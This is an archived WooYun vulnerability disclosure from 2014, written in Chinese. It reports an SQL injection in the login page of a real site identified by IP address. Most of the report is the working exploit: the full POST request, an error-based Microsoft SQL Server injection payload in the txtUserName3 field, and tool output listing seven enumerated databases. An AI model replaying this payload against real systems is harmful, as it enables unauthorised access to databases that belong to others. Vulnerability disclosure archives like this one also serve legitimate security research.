乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-05: 细节已通知厂商并且等待厂商处理中 2014-11-10: 厂商已经主动忽略漏洞,细节向公众公开
sql 注入 求个邀请码啊
http://59.77.139.100/defaultnew.aspx (POST)__VIEWSTATE=/wEPDwUKMTcwNzMxMzk2Mw8WAh4IU29mdENvZGUFLDNNWC80bnBRZ2pGL1UvSE53OFlNQ3FJemZMR0RJNzdQWVFCYzBCNFlhcVE9FgICAw9kFgYCAw9kFgICAg8QZGQWAWZkAgUPZBYCAgIPEGRkFgFmZAIHDw8WAh4HVmlzaWJsZWdkFgRmDw8WAh4ISW1hZ2VVcmwFI3RoZW1lL3RoZW1lMy9zdHlsZTEvV2FsbHBhcGVyLzUuanBnZGQCBg8PFgIfAWhkZGQafWJOgbVj8/bFRppkHmz/l3E8vQ%3D%3D&txtUserName3=asd&txtPassword3=asd&ddlUserType3=1&btnLogin=%B5%C7 %C2%BC
Place: POSTParameter: txtUserName3 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTcwNzMxMzk2Mw8WAh4IU29mdENvZGUFLDNNWC80bnBRZ2pGL1UvSE53OFlNQ3FJemZMR0RJNzdQWVFCYzBCNFlhcVE9FgICAw9kFgYCAw9kFgICAg8QZGQWAWZkAgUPZBYCAgIPEGRkFgFmZAIHDw8WAh4HVmlzaWJsZWdkFgRmDw8WAh4ISW1hZ2VVcmwFI3RoZW1lL3RoZW1lMy9zdHlsZTEvV2FsbHBhcGVyLzUuanBnZGQCBg8PFgIfAWhkZGQafWJOgbVj8/bFRppkHmz/l3E8vQ==&txtUserName3=asd' AND 3285=CONVERT(INT,(SELECT CHAR(113)+CHAR(121)+CHAR(109)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3285=3285) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113))) AND 'shHP'='shHP&txtPassword3=asd&ddlUserType3=1&btnLogin=%B5%C7 %C2%BC
available databases [7]:[*] LMS_FJGCXY[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
没有跑表了 太慢了
过滤
危害等级:无影响厂商忽略
忽略时间:2014-11-10 12:16
暂无